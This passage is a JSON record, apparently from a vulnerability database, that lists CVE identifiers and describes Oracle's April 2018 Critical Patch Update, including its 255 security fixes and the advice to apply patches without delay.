"CVE-2018-2820", "CVE-2018-2765", "CVE-2018-2876", "CVE-2016-3092", "CVE-2018-2856", "CVE-2018-2872", "CVE-2018-2858", "CVE-2016-6302", "CVE-2017-13082", "CVE-2018-2819", "CVE-2018-2783", "CVE-2018-2774", "CVE-2016-8745", "CVE-2016-2177", "CVE-2018-2784", "CVE-2018-2771", "CVE-2018-2835", "CVE-2018-2848", "CVE-2018-2840", "CVE-2016-0635", "CVE-2018-2863", "CVE-2018-2867", "CVE-2018-2845", "CVE-2018-2824", "CVE-2018-2861", "CVE-2018-2777", "CVE-2018-2738", "CVE-2018-2838", "CVE-2018-2849", "CVE-2015-7501", "CVE-2018-2754", "CVE-2018-2795", "CVE-2016-6307", "CVE-2017-3737", "CVE-2013-1768", "CVE-2017-15707", "CVE-2018-2791", "CVE-2018-2807", "CVE-2018-2766", "CVE-2018-2763", "CVE-2018-2780", "CVE-2018-2879", "CVE-2018-2752", "CVE-2016-6308", "CVE-2017-13078", "CVE-2017-5662", "CVE-2018-2816", "CVE-2014-0054", "CVE-2018-2793", "CVE-2016-2180", "CVE-2018-2742", "CVE-2018-2739", "CVE-2017-7805", "CVE-2018-2798", "CVE-2018-2814", "CVE-2018-2855", "CVE-2018-2799", "CVE-2017-5715", "CVE-2018-2787", "CVE-2016-2181", "CVE-2018-2818", "CVE-2016-6304", "CVE-2018-2753", "CVE-2018-2756", "CVE-2018-2851", "CVE-2018-2796", "CVE-2018-2764", "CVE-2018-2837", "CVE-2018-2847", "CVE-2018-0739", "CVE-2017-17562", "CVE-2018-2805", "CVE-2018-2572", "CVE-2018-2801", "CVE-2018-2761", "CVE-2018-2821", "CVE-2018-2782", "CVE-2018-2831", "CVE-2018-2773", "CVE-2018-2797", "CVE-2018-2864", "CVE-2018-2828", "CVE-2018-2866", "CVE-2018-2587", "CVE-2018-2829", "CVE-2017-7525", "CVE-2018-2770", "CVE-2016-7052", "CVE-2018-2718", "CVE-2018-2781", "CVE-2018-2830", "CVE-2018-2806", "CVE-2017-5664", "CVE-2018-2779", "CVE-2018-2825", "CVE-2018-2813", "CVE-2016-5007", "CVE-2018-2854", "CVE-2018-2811", "CVE-2018-2762", "CVE-2018-2869", "CVE-2018-2790", "CVE-2017-3738", "CVE-2018-2877", "CVE-2018-2865", "CVE-2018-2760", "CVE-2018-2834", "CVE-2016-6305", "CVE-2016-6303", "CVE-2018-2772", "CVE-2018-2846", "CVE-2018-2792", "CVE-2017-5645", "CVE-2016-2182", "CVE-2018-2833", "CVE-2017-12617", "CVE-2018-2859", "CVE-2018-2843", "CVE-2018-2804", "CVE-2017-10393", "CVE-2018-2788", "CVE-2018-2628", "CVE-2018-2785", "CVE-2018-2750", "CVE-2018-2873", "CVE-2015-7940", "CVE-2017-3736", "CVE-2018-2758", "CVE-2017-13077", "CVE-2016-3506", "CVE-2018-2737", "CVE-2018-2809", "CVE-2018-2871", "CVE-2017-15095", "CVE-2016-2179", "CVE-2016-6814", "CVE-2017-7674", "CVE-2018-2857", "CVE-2018-2839", "CVE-2018-2850", "CVE-2018-2862", "CVE-2016-6309", "CVE-2018-2794", "CVE-2018-2874"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<http://www.oracle.com/securityalerts>) for information about Oracle Security Advisories.\n\n \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 255 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2018 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2383583.1>).\n\nThe January 2018 Critical Patch Update provided patches in response to the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) processor vulnerabilities. Please refer to this Advisory and the Addendum to the January 2018 Critical Patch Update Advisory for Spectre and Meltdown MOS note ([Doc ID 2347948.1](<https://support.oracle.com/rs?type=doc&id=2347948.1>)) for information on how to obtain these patches.\n", "modified": "2018-12-10T00:00:00", "published": "2018-04-17T00:00:00", "id": "ORACLE:CPUAPR2018-3678067", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - April 2018", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}